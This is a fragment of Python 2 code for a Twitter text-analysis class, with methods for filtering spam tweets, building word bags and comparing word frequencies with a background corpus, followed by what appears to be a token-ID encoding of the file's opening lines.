""" Sort tweets by their date - useful for any sort of time series
analysis, e.g. analyzing sentiment changes over time.
"""
self.tweets_df.sort_values("date", inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_duplicate_tweets(self):
""" Drop duplicate tweets in tweets_df (except for the first instance
of each tweet)
"""
self.tweets_df.drop_duplicates("text", inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_by_search_in_name(self):
""" Drop tweets that contain element from search_terms in either
username or mention (i.e., tweets where the search term in contained in
twitter handle of someone writing or mentioned in tweet). Default
values of terms list is search_terms attribute, but user can add
to self.search_terms attribute to drop by additional terms.
"""
if not self.search_terms:
print "search_terms is empty - add at least one term to " + \
"search_terms attribute"
return self
for term in self.search_terms:
assert type(term) in (str, unicode)
assert term # to make sure string isn't empty
# Drop the tweets that contain any of search terms in either a username
# or a mention
column_names = list(self.tweets_df.columns.values)
for term in self.search_terms:
if "mentions" in column_names:
mentions_index = self.tweets_df[self.tweets_df.mentions.str.contains(term) == True].index
self.tweets_df.drop(mentions_index, inplace=True)
if "username" in column_names:
username_index = self.tweets_df[self.tweets_df.username.str.contains(term) == True].index
self.tweets_df.drop(username_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def keep_tweets_with_terms(self, term_list):
""" Drops all the tweets in tweets_df that do NOT contain at least one
term from term_list. This is useful for handling data from Twitter API
search stream, where it is often easiest to collect a single big stream
using several search terms and then parse the stream later.
Sometimes even tweets collected with java collector don't contain
desired terms, so this can be useful there as well.
term_list (string or list of strings): collection of terms to drop on
"""
if type(term_list) == str:
assert len(term_list) > 0
keep_index = self.tweets_df[self.tweets_df.text.str.contains(term_list) == True].index
self.tweets_df = self.tweets_df.iloc[keep_index]
if type(term_list) == list:
keep_index = pd.core.index.Int64Index([], dtype='int64')
for term in term_list:
assert len(term) > 0
term_keep_index = self.tweets_df[self.tweets_df.text.str.contains(term) == True].index
keep_index = keep_index.append(term_keep_index)
keep_index = keep_index.drop_duplicates()
self.tweets_df = self.tweets_df.iloc[keep_index]
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
#############################################################
# Methods to prune tweets (probably used after visual
# inspection)
#############################################################
def drop_by_term_in_name(self, terms):
""" Drop tweets that contain element from terms in either username or
mention. The terms parameter must be a list of strings.
This method is the same as drop_by_search_in_name method, except it
takes arbitrary input from user. This can be used to help get rid of
spam.
terms (list): python list of strings
"""
if not terms:
print "terms is empty - enter at least one search terms string"
return self
for term in terms:
assert type(term) in (str, unicode)
assert term
# Drop the tweets that contain any of terms in either a username
# or a mention
# don't need to set " == True", that is redundant
column_names = list(self.tweets_df.columns.values)
for term in terms:
if "mentions" in column_names:
mentions_index = self.tweets_df[self.tweets_df.mentions.str.contains(term) == True].index
self.tweets_df.drop(mentions_index, inplace=True)
if "username" in column_names:
username_index = self.tweets_df[self.tweets_df.username.str.contains(term) == True].index
self.tweets_df.drop(username_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_by_term_in_tweet(self, terms):
""" Drop tweets that contain element from terms in the tweet text.
Terms can be either a string (which is treated as one term) or a list
of strings (which area each treated as a separate drop case).
This is most useful for getting rid of repetitive or spammy tweets that
appear to be distorting data.
This is also useful for dropping retweets, which can be accomplished
by dropping tweets containing the string "rt @"
terms (string or python list of strings): terms that appear in tweets
we want to drop
"""
if type(terms) in (str, unicode):
text_index = self.tweets_df[self.tweets_df.text.str.contains(terms) == True].index
self.tweets_df.drop(text_index, inplace=True)
elif type(terms) == list:
for term in terms:
assert type(term) in (str, unicode)
assert len(term) > 0
text_index = self.tweets_df[self.tweets_df.text.str.contains(term) == True].index
self.tweets_df.drop(text_index, inplace=True)
else:
raise Exception("Input must be string or list of string.")
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_by_username_with_n_tweets(self, max_num_occurrences=1):
""" Drops all tweets by usernames that appear more than
max_num_occurrences times in tweets_df.
This function can be time consuming.
Dropping all users with more than 1 tweet should be a safe way to
filter out a lot of the spam.
"""
start_time = time.time()
print "Dropping tweets by repeated users..."
# get list of usernames that occur too much
repeat_user_counts = self.tweets_df["username"].value_counts()
for i in range(len(repeat_user_counts)):
if repeat_user_counts[i] <= max_num_occurrences:
break_index = i
break
repeated_usernames = list(repeat_user_counts[0:break_index].index)
print "Found", len(repeated_usernames), "users with more than", \
max_num_occurrences, "tweets in tweets_df"
# drop these usernames from tweets_df
percentile_num = len(repeated_usernames)//20
for i, twitter_username in enumerate(repeated_usernames):
if len(repeated_usernames) <= 100:
print "Dropping tweets from user", i
elif i%percentile_num == 0:
print "Finished", 5*i/percentile_num, "percent of user drops"
drop_index = self.tweets_df[self.tweets_df.username == twitter_username].index
self.tweets_df.drop(drop_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
print "Took", round((time.time() - start_time)/60.,3), \
"minutes to complete"
def add_stop_words(self, stopwords_item):
""" Add word or list of words to stop words used in create_word_bag.
The word might be a url or spam tag. A common case is parts of urls
that are parsed into words (e.g. from youtube) that appear repeatedly.
The new stopwords will appear at end of self.stop_words list, so user
can easily check to see which stopwords have been recently added by the
user.
stopwords: (string or list of strings):
"""
if type(stopwords_item) in (str, unicode):
if type(stopwords_item) == str:
# convert string to unicode if not unicode already
stopwords_item = stopwords_item.decode('utf-8')
self.stop_words = self.stop_words + [stopwords_item]
elif type(stopwords_item) == list:
for term in stopwords_item:
assert type(term) in (str, unicode)
assert len(term) > 0
unicode_terms_list = [term if type(term) == unicode
else term.decode('utf-8')
for term in stopwords_item]
self.stop_words = self.stop_words + unicode_terms_list
else:
raise Exception("Input must be string or list of strings.")
#############################################################
# Methods for investigating word frequencies
#############################################################
""" The create_word_freq_df method is used to create a dataframe
that gives the word occurrences and word frequencies of the top n words in
the corpus. This is created using the existing nltk object, and it is
changed depending on how many words we wish to inspect graphically.
This word frequency dataframe is fundamental object of interest, and is
stored in the word_freq_df attribute, which is a pandas dataframe.
For now the background corpus is derived from ~2.6 GB of twitter data,
composing about 72 million words. The word frequency rates from this
sample are stored in a frequency sample file that is then converted into
a python dictionary for fast lookup.
"""
def create_word_bag(self):
""" Takes tweet dataframe and outputs word_bag, which is a list of all
words in all tweets, with punctuation and stop words removed. word_bag
is contained inside the attribute self.word_bag.
This method will often be called repeatedly during data inspection, as
it needs to be redone every time some tweets are dropped from
tweets_df.
"""
start_time = time.time()
# Convert dataframe tweets column to python list of tweets, then join
# this list together into one long list of words
tweets_list = self.tweets_df["text"].tolist()
words_string = " ".join(tweets_list)
print "Time to make words_string: ", round((time.time() - start_time)/60., 3), "minutes"
start_time = time.time()
# Use nltk word tokenization to break list into words and remove
# stop words
tokens = nltk.word_tokenize(words_string)
print "Time to tokenize: ", round((time.time() - start_time)/60., 3), "minutes"
start_time = time.time()
self.word_bag = [word for word in tokens if word not in self.stop_words]
print "Time to compute word bag: ", round((time.time() - start_time)/60., 3), "minutes"
def make_nltk_object_from_word_bag(self, word_bag=None):
""" Creates nltk word statistical object from the current word_bag
attribute. word_bag is left as an input in case the user wants to
create an nltk object with an external word bag.
The most common method we'll use from this object is the
frequency method, i.e. freq_dist.freq(term), where term is word in
word bag.
Use print(freq_dist) to get the number of unique words in corpus, as
well as total number of words in corpus.
Can use freq_dist.most_common(50) to get list of 50 most common words
and the number of times each of them appears in text.
"""
if word_bag is None:
word_bag = self.word_bag
self.freq_dist = nltk.FreqDist(self.word_bag)
def create_word_freq_df(self, top_n_words):
""" Creates pandas dataframe called word_freq_df of the most common n
words in corpus, with columns:
occurrences: how often each of them occurred
frequency: word frequency in the corpus
frequency ratio: word relative frequency to background
log frequency ratio: log of the relative frequency to background rates
background_occur: the number of times word appears in background corpus
(The log is useful because, for example, a rate two times as high as
background has log ratio of +x, and a rate two times lower than
background rates has a log ratio of -x.)
n is the number of words we want to see. These words are draw in order
of how frequently they are found in the corpus, so a large number of
words should be chosen to make sure we find the interesting ones that
appear much more often than in background corpus. (If a word appears
often in our search corpus it may be because it also appear often in
the background corpus, which is not of interest.)
The actual words that were searched to collect the corpus are omitted
from this dataframe (as long as self.search_terms has been set).
n (int): number of most frequent words we want to appear in dataframe
"""
print "Creating word_freq_df..."
print "Takes about 1 minute per 1000 words"
start_time = time.time()
# make dataframe we'll use in plotting
num_words = top_n_words
word_frequencies_list = []
for word, occurrences in self.freq_dist.most_common(num_words):
# determine whether word appears in background dict; if it does
# not, the frequency ratio is set to zero
if word in self.search_terms:
continue
if word in self.background_dict.keys():
freq_ratio = self.freq_dist.freq(word)/self.background_dict[word][0]
background_freq = self.background_dict[word][0]
log_freq_ratio = log(freq_ratio)
background_occur = self.background_dict[word][1]
else:
freq_ratio = 0
background_freq = 0
log_freq_ratio = 0
background_occur = 0
# faster to make list and then make dataframe in one line
# than to repeatedly append to an existing dataframe
word_frequencies_list.append((word, occurrences,
self.freq_dist.freq(word),
freq_ratio, log_freq_ratio,
background_occur))
word_freq_df = pd.DataFrame(word_frequencies_list,
columns=['word', 'occurrences', 'frequency',
'relative frequency', 'log relative frequency',
'background occurrences'])
print "Time to create word_freq_df: ", \
round((time.time() - start_time)/60., 4), "minutes"
self.word_freq_df = word_freq_df
def custom_word_frequency_dataframe(self, words):
""" Same function as create_word_freq_df except instead of
using top n words from corpus, a custom list of words is used. This
function returns the dataframe it creates instead of setting it to
word_freq_df. (The user can append what this function creates to
word_freq_df by hand with pd.concat(df1, df1).)
An example use case is to use a list of known words of interest to
construct a type of "word vector" for a particular word (presumably
the word searched on using Java tweet collector). For example, for
politics one might choose words like "conservative", "liberal",
"regulation" and "liberty" as a set of word axes, and then see how
twitter-searched words like "taxes", "Obamacare", etc. appear as word
vectors along these axes.
words: list of words to put in dataframe - each word is a string
"""
word_frequencies_list = []
words = [x.decode("utf-8") if type(x) == str else x for x in words]
for word in words:
# determine whether word appears in both background dict and corpus
# if it does not, the frequency ratio is set to zero
if word in self.search_terms:
continue
occurrences = self.freq_dist[word]
if word in self.background_dict.keys() and occurrences != 0:
freq_ratio = self.freq_dist.freq(word)/self.background_dict[word][0]
background_freq = self.background_dict[word][0]
log_freq_ratio = log(freq_ratio)
background_occur = self.background_dict[word][1]
else:
freq_ratio = 0
background_freq = 0
log_freq_ratio = 0
background_occur = 0
# faster to make list and then make dataframe in one line
# than to repeatedly append to an existing dataframe
word_frequencies_list.append((word, occurrences,
self.freq_dist.freq(word),
freq_ratio, log_freq_ratio,
background_occur))
word_freq_df = pd.DataFrame(word_frequencies_list,
columns=['word', 'occurrences', 'frequency',
'relative frequency', 'log relative frequency',
'background_occur'])
return word_freq_df
def plot_word_frequencies(self, plot_string, dataframe=None):
""" Plots of given value about word, where plot_string is a string
that gives quantity to be plotted. This is just an example function,
user will want to use word_freq_df and matplotlib directly for more
detailed and better-looking plots.
Note that the plot can't display unicode characters correctly, so if a
word looks like a little box you'll have to pull up word_freq_df to see
what the character actually is.
plot_string (string): column of word_freq_df dataframe, e.g.
"occurrences", "frequency", "relative frequency",
"log relative frequency", etc.
dataframe (pandas dataframe): dataframe of the same form as
word_freq_df; if left empty then
self.word_freq_df is plotted
"""
if dataframe is None:
dataframe = self.word_freq_df
num_words = len(dataframe)
try:
dataframe.set_index("word")[plot_string].plot.barh(figsize=(20,
num_words/2.), fontsize=30, color="c");
plt.title(plot_string, fontsize=30);
ax = plt.axes();
ax.xaxis.grid(linewidth=4);
except:
raise Exception("Input string must be column name of word_freq_df")
""" This was more customized code that can be used later if needed - for
now the pandas default plotting code is good enough for most purposes
sns.set(style="darkgrid")
num_words = len(self.word_freq_df)
# Initialize the matplotlib figure - the second number in figure gives
# height, this will need to depend on how many words are included in
# figure
f, ax = plt.subplots(figsize=(16, num_words/2.))
plt.yticks(fontsize=20)
plt.xticks(fontsize=20)
# Plot the frequencies
sns.set_color_codes("pastel")
sns.barplot(x=plot_string, y="word", data=self.word_freq_df,
label="frequency", color="b")
# Add informative axis label
max_value = self.word_freq_df.iloc[0].frequency # find maximum frequency
# adjust axis to be slightly larger than this max frequency
ax.set(xlim=(0, max_value*1.1), ylabel="", xlabel="Word frequency")
ax.set_xlabel(plot_string, fontsize=30)
ax.xaxis.set_label_position('top')
ax.xaxis.tick_top()
ax.tick_params(axis='x', labelsize=20) # size of numerical labels
"""
#############################################################
# Methods to inspect tweets in tweets_df dataframe
#############################################################
""" These methods are used to inspect tweets of interest in the main
dataframe tweets_df. A typical workflow is to visualize tweet word
frequencies using visualization functions, then inspect a sample of tweets
that contain a word of interest. If these tweets appear to be unwanted they
can then be dropped using the dropping functions above.
Note about displaying tweets in pandas in readable form: need to set
pd.set_option('display.max_colwidth', -1) and/or
pd.set_option('display.width',800)
This makes it so entire tweet is displayed without cutoff when only tweets
are presented in dataframe.
Can enter pd.describe_option('display') to get comprehensive list of
settings for ipython displays.
"""
def tweets_containing(self, term):
""" Returns all tweets that contain term from tweets_df.
Term is a string.
The returned object is a dataframe that contains the rows of tweets_df
dataframe that have tweets containing term.
term (string): term of interest
"""
assert type(term) in (str, unicode)
assert term
tweets_containing = self.tweets_df[self.tweets_df.text.str.contains(term) == True]
print len(tweets_containing), "tweets contain this term"
return tweets_containing[["username", "text"]]
def tweets_by(self, username):
""" Returns all tweets by username from tweets_df.
Similar to above function except searches by username rather than
tweet text.
username (string): username of interest
"""
assert type(username) in (str, unicode)
assert username
tweets_by = self.tweets_df[self.tweets_df.username == username]
return tweets_by[["username", "text"]]
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
11748,
640,
198,
11748,
4818,
8079,
198,
11748,
4731,
198,
6738,
28686,
1330,
1351,
15908,
198,
6738,
28686,
13,
6978,
1330,
4654,
355,
3108,
22179,
198,
6738,
10688,
1330,
2604,
11,
2906,
346,
198,
11748,
850,
14681,
198,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
299,
2528,
74,
198,
6738,
299,
2528,
74,
13,
10215,
79,
385,
1330,
2245,
10879,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
7894,
263,
198,
6738,
256,
34788,
1330,
256,
34788,
198,
198,
2,
779,
428,
611,
345,
765,
284,
2291,
13103,
422,
257,
850,
43551,
198,
2,
28758,
62,
7266,
43551,
796,
28686,
13,
6978,
13,
5305,
6978,
7,
418,
13,
6978,
13,
397,
2777,
776,
7,
418,
13,
6978,
13,
22179,
7,
418,
13,
6978,
13,
35312,
7,
1040,
806,
13,
1136,
7753,
7,
10104,
13,
14421,
14535,
3419,
15306,
58,
15,
17241,
3855,
19620,
32665,
1039,
12,
29412,
1,
22305,
198,
2,
361,
23991,
62,
7266,
43551,
407,
287,
25064,
13,
6978,
25,
198,
2,
220,
220,
220,
25064,
13,
6978,
13,
28463,
7,
15,
11,
23991,
62,
7266,
43551,
8,
198,
198,
30094,
13,
2617,
62,
18076,
10786,
13812,
13,
9806,
62,
4033,
10394,
3256,
532,
16,
8,
198,
198,
4871,
1815,
3669,
7,
15252,
2599,
198,
220,
220,
220,
37227,
9515,
326,
2753,
287,
12665,
422,
7349,
17044,
2989,
3113,
290,
3578,
198,
220,
220,
220,
17512,
11,
3781,
290,
32704,
13,
628,
220,
220,
220,
49213,
25,
628,
220,
220,
220,
17379,
62,
43551,
62,
6978,
357,
8841,
2599,
3108,
284,
810,
20129,
17379,
17044,
2989,
3696,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
389,
8574,
628,
220,
220,
220,
1366,
62,
6978,
357,
8841,
2599,
3108,
284,
1366,
900,
422,
20129,
17044,
2989,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
632,
460,
307,
2035,
3108,
284,
2060,
2393,
11,
393,
3108,
284,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8619,
7268,
1811,
269,
21370,
3696,
13,
13283,
389,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9672,
284,
307,
287,
5794,
1577,
416,
5072,
286,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
12355,
62,
83,
732,
1039,
2163,
2174,
628,
220,
220,
220,
4469,
62,
6978,
357,
8841,
2599,
3108,
284,
4469,
1366,
13,
5178,
286,
4469,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
2393,
318,
269,
21370,
351,
15180,
705,
4775,
3256,
705,
13966,
333,
34303,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
290,
705,
35324,
6,
329,
2456,
355,
484,
3051,
287,
617,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
35789,
13,
628,
220,
220,
220,
4469,
62,
11600,
357,
67,
14188,
2599,
22155,
286,
4469,
3965,
286,
3594,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2456,
11,
973,
287,
14176,
1573,
19998,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1680,
307,
900,
1262,
2251,
62,
21756,
62,
11600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2163,
13,
628,
220,
220,
220,
2989,
62,
38707,
357,
4868,
286,
13042,
2599,
1351,
286,
2989,
2846,
973,
618,
13157,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12665,
1262,
2251,
62,
12355,
62,
83,
732,
1039,
628,
220,
220,
220,
12665,
62,
7568,
357,
79,
392,
292,
1366,
14535,
2599,
19798,
292,
1366,
14535,
326,
6622,
477,
6126,
1366,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
770,
318,
4318,
2134,
287,
281,
4554,
286,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1815,
3669,
13,
628,
220,
220,
220,
1573,
62,
21454,
357,
4868,
286,
13042,
2599,
1351,
286,
477,
1573,
16326,
287,
12665,
7763,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
287,
12665,
62,
7568,
11,
407,
1390,
2245,
2456,
357,
11338,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2456,
389,
7763,
287,
2116,
13,
11338,
62,
10879,
8,
628,
220,
220,
220,
2245,
62,
10879,
357,
4868,
286,
4731,
2599,
1351,
286,
2456,
326,
6584,
470,
307,
3017,
618,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
14492,
1573,
6131,
329,
12665,
13,
770,
3407,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3210,
3594,
2456,
588,
366,
1169,
1,
355,
880,
355,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3009,
12,
7890,
12,
11423,
1243,
588,
366,
5450,
1378,
1,
628,
220,
220,
220,
2030,
80,
62,
17080,
357,
77,
2528,
74,
2134,
2599,
299,
2528,
74,
13,
20366,
80,
20344,
7,
944,
13,
4775,
62,
21454,
1776,
299,
2528,
74,
2134,
326,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4909,
13905,
6608,
286,
2456,
287,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
21454,
628,
220,
220,
220,
1573,
62,
19503,
80,
62,
7568,
357,
79,
392,
292,
1366,
14535,
2599,
19798,
292,
1366,
14535,
7268,
1353,
299,
2456,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
287,
12665,
1366,
1863,
351,
1366,
588,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1573,
8373,
11,
1573,
8373,
9086,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
416,
4469,
8373,
329,
326,
1573,
11,
3503,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3125,
7508,
739,
2163,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
4775,
62,
19503,
80,
62,
7568,
7,
944,
11,
299,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
543,
8075,
1573,
62,
19503,
80,
62,
7568,
13,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
198,
220,
220,
220,
1303,
25458,
284,
900,
12608,
198,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
628,
220,
220,
220,
825,
900,
62,
18243,
62,
38707,
7,
944,
11,
2989,
62,
38707,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
2989,
62,
38707,
318,
257,
1351,
286,
13042,
326,
547,
973,
287,
17044,
2989,
198,
220,
220,
220,
220,
220,
220,
220,
284,
7330,
1366,
287,
12665,
62,
7568,
13,
628,
220,
220,
220,
220,
220,
220,
220,
383,
13042,
481,
307,
11513,
284,
28000,
1098,
2641,
1815,
3669,
11,
772,
996,
262,
198,
220,
220,
220,
220,
220,
220,
220,
2836,
743,
3802,
606,
355,
8850,
13042,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
6818,
2099,
7,
12947,
62,
38707,
8,
6624,
1351,
198,
220,
220,
220,
220,
220,
220,
220,
329,
3381,
287,
2989,
62,
38707,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
2099,
7,
4354,
8,
287,
357,
2536,
11,
28000,
1098,
8,
198,
220,
220,
220,
220,
220,
220,
220,
28000,
1098,
62,
4868,
796,
685,
87,
13,
12501,
1098,
7203,
40477,
12,
23,
4943,
611,
2099,
7,
87,
8,
6624,
965,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
2124,
329,
2124,
287,
2989,
62,
38707,
60,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
12947,
62,
38707,
796,
28000,
1098,
62,
4868,
628,
220,
220,
220,
825,
2251,
62,
21756,
62,
11600,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13610,
262,
22155,
286,
4469,
1573,
3965,
422,
2393,
287,
262,
198,
220,
220,
220,
220,
220,
220,
220,
4469,
1366,
3108,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1994,
25,
1573,
357,
8841,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1988,
25,
46545,
286,
1296,
357,
35324,
11,
40279,
828,
810,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8373,
318,
8373,
286,
1573,
287,
4469,
1366,
900,
11,
290,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
40279,
318,
2472,
1271,
286,
40279,
287,
4469,
1366,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
900,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
6291,
62,
9700,
796,
279,
67,
13,
961,
62,
40664,
7,
944,
13,
25249,
62,
6978,
11,
41767,
28,
2430,
11,
21004,
11639,
40477,
12,
23,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
11600,
796,
8633,
7,
13344,
7,
39873,
62,
9700,
14692,
4775,
33116,
19974,
7,
39873,
62,
9700,
14692,
35324,
33116,
39873,
62,
9700,
14692,
13966,
333,
34303,
8973,
22305,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
25249,
62,
11600,
796,
4469,
62,
11600,
628,
220,
220,
220,
825,
2251,
62,
19485,
62,
10879,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13610,
1351,
286,
2245,
2456,
973,
287,
2251,
62,
4775,
62,
21454,
2163,
13,
198,
220,
220,
220,
220,
220,
220,
220,
13707,
2456,
2727,
994,
389,
26235,
532,
262,
2836,
743,
751,
649,
2245,
2456,
198,
220,
220,
220,
220,
220,
220,
220,
1568,
351,
262,
751,
62,
11338,
62,
10879,
2163,
13,
628,
220,
220,
220,
220,
220,
220,
220,
770,
4277,
1351,
21001,
3594,
2245,
10879,
422,
299,
2528,
74,
35789,
198,
220,
220,
220,
220,
220,
220,
220,
357,
11338,
10879,
828,
21025,
2288,
8849,
422,
21015,
3210,
4731,
5888,
11,
198,
220,
220,
220,
220,
220,
220,
220,
290,
257,
2183,
12,
4868,
262,
1772,
1043,
4465,
618,
32096,
12665,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
21025,
2288,
796,
685,
9186,
13,
12501,
1098,
10786,
40477,
12,
23,
11537,
329,
2378,
287,
1351,
7,
8841,
13,
79,
16260,
2288,
15437,
198,
220,
220,
220,
220,
220,
220,
220,
2245,
796,
2245,
10879,
13,
10879,
10786,
39126,
11537,
1343,
21025,
2288,
1343,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
84,
6,
17034,
3256,
334,
6,
14181,
3256,
334,
6,
8869,
3256,
334,
6,
4023,
3256,
334,
1,
77,
470,
1600,
334,
30543,
82,
1600,
334,
1,
9313,
11,
334,
1,
7061,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
334,
30543,
76,
1600,
334,
1,
438,
1600,
334,
30543,
297,
1600,
334,
30543,
303,
1600,
334,
30543,
260,
1600,
334,
1,
1003,
2503,
8973,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11338,
62,
10879,
796,
2245,
628,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
2,
198,
220,
220,
220,
1303,
25458,
284,
6431,
12665,
2884,
21179,
2989,
351,
198,
220,
220,
220,
1303,
7349,
3497,
19620,
32665,
1039,
198,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
2,
628,
220,
220,
220,
825,
2251,
62,
12355,
62,
83,
732,
1039,
7,
944,
11,
2472,
62,
22510,
62,
83,
732,
1039,
11,
12665,
62,
525,
62,
5143,
11,
12405,
12947,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2457,
62,
28446,
28,
14202,
11,
5072,
62,
43551,
2625,
22915,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
22119,
62,
31412,
28,
19,
11,
477,
62,
83,
732,
